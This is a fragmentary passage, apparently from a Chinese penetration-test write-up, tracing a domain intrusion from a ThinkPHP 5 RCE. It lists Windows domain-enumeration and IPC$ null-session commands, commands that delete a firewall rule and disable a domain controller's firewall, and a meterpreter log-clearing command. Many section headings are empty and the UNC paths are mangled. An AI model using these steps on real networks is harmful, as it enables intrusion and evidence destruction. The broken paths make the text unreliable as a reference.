访问网页,发现网站是ThinkPHP5
2.1 目录扫描
可以看到存在后面add.php,但没有密码
2.2 ThinkPHP V5.0.22 RCE
route print # 打印路由信息
net view # 查看局域网内其他主机名
arp -a # 查看arp缓存
net start # 查看开启了哪些服务
net share # 查看开启了哪些共享
net share ipc$ # 开启ipc共享
net share c$ # 开启c盘共享
net use \192.168.xx.xxipc$ "" /user:"" # 与192.168.xx.xx建立空连接
net use \192.168.xx.xxc$ "密码" /user:"用户名" # 建立c盘共享
dir \192.168.xx.xxc$user # 查看192.168.xx.xx c盘user目录下的文件
net config Workstation # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
net user # 查看本机用户列表
net user /domain # 查看域用户
net localgroup administrators # 查看本地管理员组(通常会有域用户)
net view /domain # 查看有几个域
net user 用户名 /domain # 获取指定域用户的信息
net group /domain # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
net group 组名 /domain # 查看域中某工作组
net time /domain // 主域服务器会同时作为时间服务器
net group "domain admins" /domain # 查看域管理员的名字
net group "domain computers" /domain # 查看域中的其他主机名
net group "doamin controllers" /domain # 查看域控制器(可能有多台)
net group "Enterprise Admins" /domain // 查看域管理员组
3.1 信息收集
3.2 利用CS
3.3 内网扫描
3.4 利用MSF
3.5 ipc连接关闭域控防火墙
netsh advfirewall firewall delete rule name="f.exe"
sc \192.168.138.138 start unablefirewall # 立即启动服务
3.6 远程登录
3.7 日志清除
run event_manager -c
原文始发于微信公众号(山石网科安全技术研究院):记一次曲折的域环境渗透测试 III
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论